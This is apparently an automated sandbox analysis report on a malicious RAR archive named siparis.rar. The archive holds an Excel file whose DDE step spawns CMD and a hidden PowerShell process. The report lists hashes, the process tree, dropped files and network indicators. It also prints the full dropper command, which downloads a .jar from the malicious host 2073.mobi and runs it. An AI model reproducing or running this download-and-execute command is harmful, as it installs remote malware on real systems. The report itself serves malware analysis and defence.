analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

siparis.rar

Full analysis: https://app.any.run/tasks/056b2d61-f8e3-495b-a5d8-c2d374c083d4
Verdict: Malicious activity
Analysis date: April 24, 2019, 07:08:00
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5:

6C6167166A495A26A939924F9E4CB825

SHA1:

1F4A35C5C32DDA49B385AAF58B5F48FCAB11811B

SHA256:

387958AEB0F7F82A3B99B6097CD5F5358C2CABACB845680B64A8A9DA1B7F6F9A

SSDEEP:

384:mAc3goMo36hk36hFyP4HIzKORu/I4LryMz0m/h:swtoKHMAOKOI/Ieryy0m/h

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 2076)
    • Executes PowerShell scripts

      • CMD.EXE (PID: 2188)
    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 2076)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • WinRAR.exe (PID: 2344)
    • Creates files in the user directory

      • powershell.exe (PID: 2732)
  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2076)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
35
Monitored processes
4
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs excel.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2344"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\siparis.rar"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
2076"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
2188CMD.EXE /c powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile(\"http://2073.mobi\" ,\" %appdata%\\Wc7spi.jar\") }" & %appdata%\\Wc7spi.jarC:\Windows\system32\CMD.EXEEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2732powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile(\"http://2073.mobi\" ,\" C:\Users\admin\AppData\Roaming\\Wc7spi.jar\") }" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CMD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 250
Read events
1 146
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
2344WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIa2344.22745\siparis.xls
MD5:
SHA256:
2076EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRA759.tmp.cvr
MD5:
SHA256:
2732powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DHU50VNFQ9M1FEFR8DWL.temp
MD5:
SHA256:
2732powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF
SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
2732powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF11d1a5.TMPbinary
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF
SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2732
powershell.exe
GET
404
23.254.215.182:80
http://2073.mobi/
US
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2732
powershell.exe
23.254.215.182:80
2073.mobi
Hostwinds LLC.
US
malicious

DNS requests

Domain
IP
Reputation
2073.mobi
  • 23.254.215.182
malicious

Threats

No threats detected
No debug info